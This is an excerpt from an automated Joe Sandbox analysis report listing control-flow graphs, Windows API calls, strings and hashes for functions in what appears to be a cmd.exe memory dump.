778->777 779 7ff7e1dc4031-7ff7e1dc4047 call 7ff7e1dc855c _local_unwind 778->779 799 7ff7e1dc404c-7ff7e1dc4062 call 7ff7e1dc855c _local_unwind 779->799 788 7ff7e1dc3ed5-7ff7e1dc3ef7 GetFileAttributesW 780->788 789 7ff7e1dc3f08-7ff7e1dc3f0b 780->789 793 7ff7e1dc3ec7-7ff7e1dc3ec9 781->793 784 7ff7e1dc3e66-7ff7e1dc3e8f GetFileAttributesW 783->784 785 7ff7e1dc3e57-7ff7e1dc3e60 783->785 784->774 784->777 785->784 791 7ff7e1dc3f9d-7ff7e1dc3fa5 785->791 794 7ff7e1dc4067-7ff7e1dc4098 GetLastError call 7ff7e1dc855c _local_unwind 788->794 795 7ff7e1dc3efd-7ff7e1dc3f02 788->795 797 7ff7e1dc3f1e-7ff7e1dc3f40 SetCurrentDirectoryW 789->797 798 7ff7e1dc3f0d-7ff7e1dc3f11 789->798 791->783 793->780 793->799 801 7ff7e1dc409d-7ff7e1dc40b3 call 7ff7e1dc855c _local_unwind 794->801 795->789 795->801 803 7ff7e1dc3f46-7ff7e1dc3f69 call 7ff7e1dc498c 797->803 805 7ff7e1dc40b8-7ff7e1dc40de GetLastError call 7ff7e1dc855c _local_unwind 797->805 798->803 804 7ff7e1dc3f13-7ff7e1dc3f1c 798->804 799->794 801->805 815 7ff7e1dc3f6f-7ff7e1dc3f98 call 7ff7e1dc417c 803->815 816 7ff7e1dc40e3-7ff7e1dc40f9 call 7ff7e1dc855c _local_unwind 803->816 804->797 804->803 805->816 815->775 816->766
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                      • String ID: :
                                                      • API String ID: 1809961153-336475711
                                                      • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                      • Instruction ID: 4ec76dc31363dbd345fda882f7e6bc98f7d0c1f480bb4d0d3ff1ce62d33001d8
                                                      • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                      • Instruction Fuzzy Hash: ADD15F32A18B8591EB20EB15E4463B9F7A1FB84740F848A37DA8E437A4DFBCE444C751
                                                      Function 00007FF7E1DC2394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 914 7ff7e1dc2394-7ff7e1dc2416 memset call 7ff7e1dbca40 917 7ff7e1dce0d2-7ff7e1dce0da call 7ff7e1dc4c1c 914->917 918 7ff7e1dc241c-7ff7e1dc2453 GetModuleFileNameW call 7ff7e1dc081c 914->918 923 7ff7e1dce0db-7ff7e1dce0ee call 7ff7e1dc498c 917->923 918->923 924 7ff7e1dc2459-7ff7e1dc2468 call 7ff7e1dc081c 918->924 929 7ff7e1dce0f4-7ff7e1dce107 call 7ff7e1dc498c 923->929 924->929 930 7ff7e1dc246e-7ff7e1dc247d call 7ff7e1dc081c 924->930 939 7ff7e1dce10d-7ff7e1dce123 929->939 935 7ff7e1dc2516-7ff7e1dc2529 call 7ff7e1dc498c 930->935 936 7ff7e1dc2483-7ff7e1dc2492 call 7ff7e1dc081c 930->936 935->936 936->939 947 7ff7e1dc2498-7ff7e1dc24a7 call 7ff7e1dc081c 936->947 942 7ff7e1dce125-7ff7e1dce139 wcschr 939->942 943 7ff7e1dce13f-7ff7e1dce17a _wcsupr 939->943 942->943 944 7ff7e1dce27c 942->944 945 7ff7e1dce181-7ff7e1dce199 wcsrchr 943->945 946 7ff7e1dce17c-7ff7e1dce17f 943->946 949 7ff7e1dce283-7ff7e1dce29b call 7ff7e1dc498c 944->949 948 7ff7e1dce19c 945->948 946->948 956 7ff7e1dce2a1-7ff7e1dce2c3 _wcsicmp 947->956 957 7ff7e1dc24ad-7ff7e1dc24c5 call 7ff7e1dc3c24 947->957 951 7ff7e1dce1a0-7ff7e1dce1a7 948->951 949->956 951->951 954 7ff7e1dce1a9-7ff7e1dce1bb 951->954 958 7ff7e1dce264-7ff7e1dce277 call 7ff7e1dc1300 954->958 959 7ff7e1dce1c1-7ff7e1dce1e6 954->959 964 7ff7e1dc24ca-7ff7e1dc24db 957->964 958->944 962 7ff7e1dce1e8-7ff7e1dce1f1 959->962 963 7ff7e1dce21a 959->963 965 7ff7e1dce1f3-7ff7e1dce1f6 962->965 966 7ff7e1dce201-7ff7e1dce210 962->966 969 7ff7e1dce21d-7ff7e1dce21f 963->969 967 7ff7e1dc24e9-7ff7e1dc2514 call 7ff7e1dc8f80 964->967 968 7ff7e1dc24dd-7ff7e1dc24e4 ??_V@YAXPEAX@Z 964->968 965->966 970 7ff7e1dce1f8-7ff7e1dce1ff 965->970 966->963 971 7ff7e1dce212-7ff7e1dce218 966->971 968->967 969->949 973 7ff7e1dce221-7ff7e1dce228 969->973 970->965 970->966 971->969 975 7ff7e1dce254-7ff7e1dce262 973->975 976 7ff7e1dce22a-7ff7e1dce231 973->976 975->944 977 7ff7e1dce234-7ff7e1dce237 976->977 977->975 978 7ff7e1dce239-7ff7e1dce242 977->978 978->975 979 7ff7e1dce244-7ff7e1dce252 978->979 979->975 979->977
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                      • API String ID: 2622545777-4197029667
                                                      • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                      • Instruction ID: e3ce112b628bd6a685205ba7cf54b56763ecfaa58bffd89a1914da3c8a3066ec
                                                      • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                      • Instruction Fuzzy Hash: 69919161B0968285EF25EB10D8523B9E7A5FF44B44FC48536C90E87695DFBCE504C3A2
                                                      Function 00007FF7E1DC0580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleMode_get_osfhandle
                                                      • String ID: CMD.EXE
                                                      • API String ID: 1606018815-3025314500
                                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                      • Instruction ID: 305bc909e2150de27535e9c9249add56f83aa816bc878c3d18c7c9d81822ff7b
                                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                      • Instruction Fuzzy Hash: F141F035E09A029BE708EB15E846378BB60FB89752FC4D176C51E83364DFBCA514C662
                                                      Function 00007FF7E1DBC620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 992 7ff7e1dbc620-7ff7e1dbc66f GetConsoleTitleW 993 7ff7e1dbc675-7ff7e1dbc687 call 7ff7e1dbaf14 992->993 994 7ff7e1dcc5f2 992->994 998 7ff7e1dbc689 993->998 999 7ff7e1dbc68e-7ff7e1dbc69d call 7ff7e1dbca40 993->999 997 7ff7e1dcc5fc-7ff7e1dcc60c GetLastError 994->997 1000 7ff7e1dcc5e3 call 7ff7e1db3278 997->1000 998->999 1004 7ff7e1dcc5e8-7ff7e1dcc5ed call 7ff7e1dc855c 999->1004 1005 7ff7e1dbc6a3-7ff7e1dbc6ac 999->1005 1000->1004 1004->994 1007 7ff7e1dbc6b2-7ff7e1dbc6c5 call 7ff7e1dbb9c0 1005->1007 1008 7ff7e1dbc954-7ff7e1dbc95e call 7ff7e1dc291c 1005->1008 1015 7ff7e1dbc9b5-7ff7e1dbc9b8 call 7ff7e1dc5c6c 1007->1015 1016 7ff7e1dbc6cb-7ff7e1dbc6ce 1007->1016 1013 7ff7e1dbc964-7ff7e1dbc96b call 7ff7e1db89c0 1008->1013 1014 7ff7e1dcc5de-7ff7e1dcc5e0 1008->1014 1021 7ff7e1dbc970-7ff7e1dbc972 1013->1021 1014->1000 1020 7ff7e1dbc9bd-7ff7e1dbc9c9 call 7ff7e1dc855c 1015->1020 1016->1004 1019 7ff7e1dbc6d4-7ff7e1dbc6e9 1016->1019 1022 7ff7e1dcc616-7ff7e1dcc620 call 7ff7e1dc855c 1019->1022 1023 7ff7e1dbc6ef-7ff7e1dbc6fa 1019->1023 1038 7ff7e1dbc9d0-7ff7e1dbc9d7 1020->1038 1021->997 1026 7ff7e1dbc978-7ff7e1dbc99a towupper 1021->1026 1028 7ff7e1dcc627 1022->1028 1027 7ff7e1dbc700-7ff7e1dbc713 1023->1027 1023->1028 1033 7ff7e1dbc9a0-7ff7e1dbc9a9 1026->1033 1029 7ff7e1dcc631 1027->1029 1030 7ff7e1dbc719-7ff7e1dbc72c 1027->1030 1028->1029 1035 7ff7e1dcc63b 1029->1035 1034 7ff7e1dbc732-7ff7e1dbc747 call 7ff7e1dbd3f0 1030->1034 1030->1035 1033->1033 1036 7ff7e1dbc9ab-7ff7e1dbc9af 1033->1036 1045 7ff7e1dbc74d-7ff7e1dbc750 1034->1045 1046 7ff7e1dbc8ac-7ff7e1dbc8af 1034->1046 1043 7ff7e1dcc645 1035->1043 1036->1015 1039 7ff7e1dcc60e-7ff7e1dcc611 call 7ff7e1ddec14 1036->1039 1041 7ff7e1dbc872-7ff7e1dbc8aa call 7ff7e1dc855c call 7ff7e1dc8f80 1038->1041 1042 7ff7e1dbc9dd-7ff7e1dcc6da SetConsoleTitleW 1038->1042 1039->1022 1042->1041 1053 7ff7e1dcc64e-7ff7e1dcc651 1043->1053 1049 7ff7e1dbc752-7ff7e1dbc764 call 7ff7e1dbbd38 1045->1049 1050 7ff7e1dbc76a-7ff7e1dbc76d 1045->1050 1046->1045 1052 7ff7e1dbc8b5-7ff7e1dbc8d3 wcsncmp 1046->1052 1049->1004 1049->1050 1056 7ff7e1dbc840-7ff7e1dbc84b call 7ff7e1dbcb40 1050->1056 1057 7ff7e1dbc773-7ff7e1dbc77a 1050->1057 1052->1050 1058 7ff7e1dbc8d9 1052->1058 1059 7ff7e1dcc657-7ff7e1dcc65b 1053->1059 1060 7ff7e1dbc80d-7ff7e1dbc811 1053->1060 1078 7ff7e1dbc856-7ff7e1dbc86c 1056->1078 1079 7ff7e1dbc84d-7ff7e1dbc855 call 7ff7e1dbcad4 1056->1079 1065 7ff7e1dbc780-7ff7e1dbc784 1057->1065 1058->1045 1059->1060 1061 7ff7e1dbc9e2-7ff7e1dbc9e7 1060->1061 1062 7ff7e1dbc817-7ff7e1dbc81b 1060->1062 1061->1062 1069 7ff7e1dbc9ed-7ff7e1dbc9f7 call 7ff7e1dc291c 1061->1069 1067 7ff7e1dbc821 1062->1067 1068 7ff7e1dbca1b-7ff7e1dbca1f 1062->1068 1070 7ff7e1dbc78a-7ff7e1dbc7a4 wcschr 1065->1070 1071 7ff7e1dbc83d 1065->1071 1074 7ff7e1dbc824-7ff7e1dbc82d 1067->1074 1068->1067 1073 7ff7e1dbca25-7ff7e1dcc6b3 call 7ff7e1db3278 1068->1073 1089 7ff7e1dcc684-7ff7e1dcc698 call 7ff7e1db3278 1069->1089 1090 7ff7e1dbc9fd-7ff7e1dbca00 1069->1090 1076 7ff7e1dbc7aa-7ff7e1dbc7ad 1070->1076 1077 7ff7e1dbc8de-7ff7e1dbc8f7 1070->1077 1071->1056 1073->1004 1074->1074 1081 7ff7e1dbc82f-7ff7e1dbc837 1074->1081 1083 7ff7e1dbc7b0-7ff7e1dbc7b8 1076->1083 1084 7ff7e1dbc900-7ff7e1dbc908 1077->1084 1078->1038 1078->1041 1079->1078 1081->1065 1081->1071 1083->1083 1091 7ff7e1dbc7ba-7ff7e1dbc7c7 1083->1091 1084->1084 1092 7ff7e1dbc90a-7ff7e1dbc915 1084->1092 1089->1004 1090->1062 1095 7ff7e1dbca06-7ff7e1dbca10 call 7ff7e1db89c0 1090->1095 1091->1053 1096 7ff7e1dbc7cd-7ff7e1dbc7db 1091->1096 1097 7ff7e1dbc93a-7ff7e1dbc944 1092->1097 1098 7ff7e1dbc917 1092->1098 1095->1062 1114 7ff7e1dbca16-7ff7e1dcc67f GetLastError call 7ff7e1db3278 1095->1114 1099 7ff7e1dbc7e0-7ff7e1dbc7e7 1096->1099 1102 7ff7e1dbca2a-7ff7e1dbca2f call 7ff7e1dc9158 1097->1102 1103 7ff7e1dbc94a 1097->1103 1100 7ff7e1dbc920-7ff7e1dbc928 1098->1100 1105 7ff7e1dbc800-7ff7e1dbc803 1099->1105 1106 7ff7e1dbc7e9-7ff7e1dbc7f1 1099->1106 1107 7ff7e1dbc932-7ff7e1dbc938 1100->1107 1108 7ff7e1dbc92a-7ff7e1dbc92f 1100->1108 1102->1014 1103->1008 1105->1043 1112 7ff7e1dbc809 1105->1112 1106->1105 1111 7ff7e1dbc7f3-7ff7e1dbc7fe 1106->1111 1107->1097 1107->1100 1108->1107 1111->1099 1111->1105 1112->1060 1114->1004
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleTitlewcschr
                                                      • String ID: /$:
                                                      • API String ID: 2364928044-4222935259
                                                      • Opcode ID: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                      • Instruction ID: 5652382e6586cbacfea63a5d71d9cb95beb8bfa4e2eb34bd2aa80afd744bc34c
                                                      • Opcode Fuzzy Hash: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                      • Instruction Fuzzy Hash: 8EC1AF61E18642A1FB24FB15D416BB9A2A0FF84B90FC88537DA1F462D5DFBCE440C362
                                                      Function 00007FF7E1DC8D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1171 7ff7e1dc8d80-7ff7e1dc8da2 1172 7ff7e1dc8da4-7ff7e1dc8daf 1171->1172 1173 7ff7e1dc8db1-7ff7e1dc8db4 1172->1173 1174 7ff7e1dc8dcc 1172->1174 1175 7ff7e1dc8db6-7ff7e1dc8dbd 1173->1175 1176 7ff7e1dc8dbf-7ff7e1dc8dca Sleep 1173->1176 1177 7ff7e1dc8dd1-7ff7e1dc8dd9 1174->1177 1175->1177 1176->1172 1178 7ff7e1dc8ddb-7ff7e1dc8de5 _amsg_exit 1177->1178 1179 7ff7e1dc8de7-7ff7e1dc8def 1177->1179 1180 7ff7e1dc8e4c-7ff7e1dc8e54 1178->1180 1181 7ff7e1dc8e46 1179->1181 1182 7ff7e1dc8df1-7ff7e1dc8e0a 1179->1182 1184 7ff7e1dc8e73-7ff7e1dc8e75 1180->1184 1185 7ff7e1dc8e56-7ff7e1dc8e69 _initterm 1180->1185 1181->1180 1183 7ff7e1dc8e0e-7ff7e1dc8e11 1182->1183 1186 7ff7e1dc8e13-7ff7e1dc8e15 1183->1186 1187 7ff7e1dc8e38-7ff7e1dc8e3a 1183->1187 1188 7ff7e1dc8e80-7ff7e1dc8e88 1184->1188 1189 7ff7e1dc8e77-7ff7e1dc8e79 1184->1189 1185->1184 1192 7ff7e1dc8e3c-7ff7e1dc8e41 1186->1192 1193 7ff7e1dc8e17-7ff7e1dc8e1b 1186->1193 1187->1180 1187->1192 1190 7ff7e1dc8eb4-7ff7e1dc8ec8 call 7ff7e1dc37d8 1188->1190 1191 7ff7e1dc8e8a-7ff7e1dc8e98 call 7ff7e1dc94f0 1188->1191 1189->1188 1200 7ff7e1dc8ecd-7ff7e1dc8eda 1190->1200 1191->1190 1201 7ff7e1dc8e9a-7ff7e1dc8eaa 1191->1201 1198 7ff7e1dc8f28-7ff7e1dc8f3d 1192->1198 1195 7ff7e1dc8e2d-7ff7e1dc8e36 1193->1195 1196 7ff7e1dc8e1d-7ff7e1dc8e29 1193->1196 1195->1183 1196->1195 1203 7ff7e1dc8ee4-7ff7e1dc8eeb 1200->1203 1204 7ff7e1dc8edc-7ff7e1dc8ede exit 1200->1204 1201->1190 1205 7ff7e1dc8eed-7ff7e1dc8ef3 _cexit 1203->1205 1206 7ff7e1dc8ef9 1203->1206 1204->1203 1205->1206 1206->1198
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                      • String ID:
                                                      • API String ID: 4291973834-0
                                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                      • Instruction ID: 670618e5eb25f9c9fc1a6c64f9bb240db8d93f711c49c73dc78f429ce4a5940a
                                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                      • Instruction Fuzzy Hash: 6D410831E08A0386FB54FB14E882735A2A4EF44745F859937D90D876A0DFFDE890C7A2
                                                      Function 00007FF7E1DB89C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1207 7ff7e1db89c0-7ff7e1db8a3d memset call 7ff7e1dbca40 1210 7ff7e1db8a43-7ff7e1db8a71 GetDriveTypeW 1207->1210 1211 7ff7e1db8ace-7ff7e1db8adf 1207->1211 1212 7ff7e1dcb411-7ff7e1dcb422 1210->1212 1213 7ff7e1db8a77-7ff7e1db8a7a 1210->1213 1214 7ff7e1db8ae1-7ff7e1db8ae8 ??_V@YAXPEAX@Z 1211->1214 1215 7ff7e1db8aed 1211->1215 1217 7ff7e1dcb424-7ff7e1dcb42b ??_V@YAXPEAX@Z 1212->1217 1218 7ff7e1dcb430-7ff7e1dcb435 1212->1218 1213->1211 1219 7ff7e1db8a7c-7ff7e1db8a7f 1213->1219 1214->1215 1216 7ff7e1db8aef-7ff7e1db8b16 call 7ff7e1dc8f80 1215->1216 1217->1218 1218->1216 1219->1211 1221 7ff7e1db8a81-7ff7e1db8ac8 GetVolumeInformationW 1219->1221 1221->1211 1223 7ff7e1dcb3fc-7ff7e1dcb40b GetLastError 1221->1223 1223->1211 1223->1212
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                                      • String ID:
                                                      • API String ID: 850181435-0
                                                      • Opcode ID: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                      • Instruction ID: aed5a1d0e40115584a3ea4acc74fdf75245e7e14bf6fbf7e08957f454d84217e
                                                      • Opcode Fuzzy Hash: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                      • Instruction Fuzzy Hash: E641AE32A08BC1D9E720DF20D8453EAB7A0FB89B85F948436DA4E8BB48CF78D555C711
                                                      Function 00007FF7E1DC4A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1224 7ff7e1dc4a14-7ff7e1dc4a3e GetEnvironmentStringsW 1225 7ff7e1dc4a40-7ff7e1dc4a46 1224->1225 1226 7ff7e1dc4aae-7ff7e1dc4ac5 1224->1226 1227 7ff7e1dc4a59-7ff7e1dc4a8f GetProcessHeap HeapAlloc 1225->1227 1228 7ff7e1dc4a48-7ff7e1dc4a52 1225->1228 1230 7ff7e1dc4a91-7ff7e1dc4a9a memmove 1227->1230 1231 7ff7e1dc4a9f-7ff7e1dc4aa9 FreeEnvironmentStringsW 1227->1231 1228->1228 1229 7ff7e1dc4a54-7ff7e1dc4a57 1228->1229 1229->1227 1229->1228 1230->1231 1231->1226
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                      • memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                      • String ID:
                                                      • API String ID: 1623332820-0
                                                      • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                      • Instruction ID: e7159a356838dfa925e944921bed8ffde96f7ac5a5e3fea81a3999d98a113248
                                                      • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                      • Instruction Fuzzy Hash: E211C122A08B4282DF15EB05B005239FBA0EB8DF84B989436DE0E43740DF7CE441C760
                                                      Function 00007FF7E1DC5CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
